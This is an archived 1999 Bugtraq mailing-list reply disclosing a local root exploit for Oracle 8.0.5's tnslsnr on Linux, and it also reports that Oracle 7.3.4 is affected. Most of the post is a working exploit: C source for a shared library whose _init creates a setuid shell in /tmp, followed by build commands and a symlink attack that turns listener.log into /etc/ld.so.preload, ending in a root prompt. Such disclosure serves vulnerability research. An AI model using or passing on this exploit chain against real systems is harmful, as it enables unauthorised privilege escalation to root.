[12594] in bugtraq

home help back first fref pref prev next nref lref last post

Re: Oracle 8 root exploit

daemon@ATHENA.MIT.EDU (Martin Mevald)
Mon Nov 15 13:35:29 1999

X-Envelope-To: <BUGTRAQ@SECURITYFOCUS.COM>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <Pine.LNX.4.20.9911151248050.2500-100000@localhost.localdomain>
Date:         Mon, 15 Nov 1999 16:51:54 +0100
Reply-To: Martin Mevald <martinmv@HORNET.CZ>
From: Martin Mevald <martinmv@HORNET.CZ>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

Greetings,

Oracle 7.3.4 is vulnerable too.

$ uname -a
SunOS sun450 5.6 Generic_105181-12 sun4u sparc SUNW,Ultra-4

---

Linux: Oracle version: 8.0.5

There isn't dbsnmp with suid bit on Linux. There is tnslsnr.

Program dump file listener.log:

	open("listener.log", O_WRONLY|O_APPEND|O_CREAT, 0666)



Exploit:

oracle-ex.c
--------------------------

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{

  if (!geteuid()) {

  remove("/etc/ld.so.preload");

  execl("/bin/bash","bash","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);

  }

}
---------------------------

$ gcc -o oracle-ex.o -c oracle-ex.c -fPIC
$ gcc  -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 oracle-ex.o -nostartfiles

$  unset ORACLE_HOME

$  umask 0000
$  ln -s /etc/ld.so.preload  /tmp/listener.log
$  /u01/app/oracle/product/8.0.5/bin/tnslsnr

$ echo /tmp/libno_ex.so.1.0 >/etc/ld.so.preload

$ telnet localhost

Trying ...
Connected to localhost.localdomain.
Escape character is '^]'.
Connection closed by foreign host.

$ ./xxxx
#


Martin Mevald, martinmv@hornet.cz

On Sat, 13 Nov 1999, Tellier, Brock wrote:

> Greetings,
>
> OVERVIEW
> A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any user
> to obtain root privileges.
>

home help back first fref pref prev next nref lref last post